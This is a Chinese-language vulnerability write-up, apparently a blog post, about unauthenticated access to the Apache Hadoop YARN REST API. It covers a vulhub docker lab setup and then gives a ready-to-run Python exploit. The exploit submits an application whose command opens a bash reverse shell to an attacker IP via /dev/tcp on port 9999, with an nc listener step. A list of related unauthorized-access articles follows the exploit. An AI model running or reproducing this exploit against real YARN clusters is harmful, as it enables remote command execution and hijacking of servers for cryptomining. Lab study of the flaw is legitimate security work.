漏洞概述

YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,那么任何黑客则就均可利用其进行远程命令执行,从而进行挖矿等行为。

受影响范围

Apache Hadoop YARN资源管理系统

环境搭建

cd /vulhub/hadoop/unauthorized-yarn
docker-compose up -d


环境搭建成功,未授权访问到页面

#!/usr/bin/env pythonimport requeststarget = 'http://127.0.0.1:8088/'
lhost = 'x.x.x.x' # 修改lhost反弹shell的IPurl = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,},},'application-type': 'YARN',
}
requests.post(url, json=data)

nc -lvvp 9999 #监听本地端口9999
运行exp python exploit.py
获取shell

Hadoop 未授权访问 getshell相关推荐

  1. redis未授权访问getshell的方式

    redis简介 Redis是一个开源的使用ANSI C语言编写.遵守BSD协议.支持网络.可基于内存亦可持久化的日志型.Key-Value数据库 端口:6379 环境 kali =>192.16 ...

  2. Hadoop未授权访问漏洞记录(影响版本:全版本,端口号:50070)

    漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了 Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以 ...

  3. Hadoop未授权访问漏洞

    漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了 Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以 ...

  4. 二十八种未授权访问漏洞合集(暂时最全)

    目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...

  5. 【应急类漏洞】————1、未授权访问漏洞总结

    前言 2018年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪.根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用未授权访问等通用漏洞进行植 ...

  6. 漏洞复现 - - - 未授权访问漏洞Redis

    目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 ​编辑 ...

  7. 未授权访问漏洞-Redis未授权访问漏洞

    文章目录 未授权概述 常见未授权访问漏洞 Redis未授权访问 Redis简介 应用场景 Redis 架构 漏洞发现 端口 端口探测 Redis常用命令 Redis历史漏洞 Redis未授权访问 Re ...

  8. 尝试从redis未授权访问到getshell的四种姿势(失败)

    尝试从redis未授权访问到getshell的四种姿势(失败) 使用Goby扫描某SRC的C段,发现一个Redis未授权,经验证漏洞存在,故尝试Getshell提高危害(拿更多赏金) 虽然Getshe ...

  9. Redis 未授权访问漏洞与getshell(附getshell检测工具)

    0x00 Redis简介 Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题 ...

最新文章

  1. Linux存储的基本管理
  2. UML类图与类的关系
  3. [数据库基础]——索引详解
  4. QT中添加背景图片,颜色,以及字体等
  5. 计蒜客 Reversion Count
  6. 2050,一个属于年青人的大会
  7. 浅谈html的语义化和一些简单优化,html标签语义化
  8. jQuery+css3实现新年贺卡
  9. Android 系统(186)---最易懂的Android屏幕适配解决方案--总结版
  10. gzdeflate函数_PHP中的gzcompress、gzdeflate、gzencode函数详解_php实例
  11. MFC:ListControl用法
  12. c语言2 amp 3结果,C语言里23=什么?
  13. unicode学习笔记
  14. hadoop2.6---常用命令
  15. koa-body koa2 使用 koa-body 代替 koa-bodyparser 和 koa-multer
  16. Python➕ ps 图钉画图纸制作教程
  17. 傅里叶级数构建信号要求频率有正有负_电子科大学长说—信号与系统考研例题详解重点习题...
  18. EnlightenGAN: Deep Light Enhancement without Paired Supervision论文阅读笔记
  19. 关于数据科学的十本好书
  20. 高速缓存DNS解析详解

热门文章

  1. 有必要练习一下口才和演讲的技巧
  2. 谈谈做飞思卡尔的感受
  3. SpringBoot 系列教程(六十):SpringBoot整合Swagger-Bootstrap-Ui
  4. 楷书书法规则_1.硬笔书法 楷书规则
  5. 超级详细的PostgreSQL创建数据库操作并附带图文
  6. 通信数据机房动环综合监控系统解决方案
  7. 如何用手机给证件照P正装?这两个小妙招快学起来
  8. 题外:分享风向风力的计算方法
  9. 利用Lambda表达式对 对象数组的排序
  10. Nextjs中ts语法中使用全局变量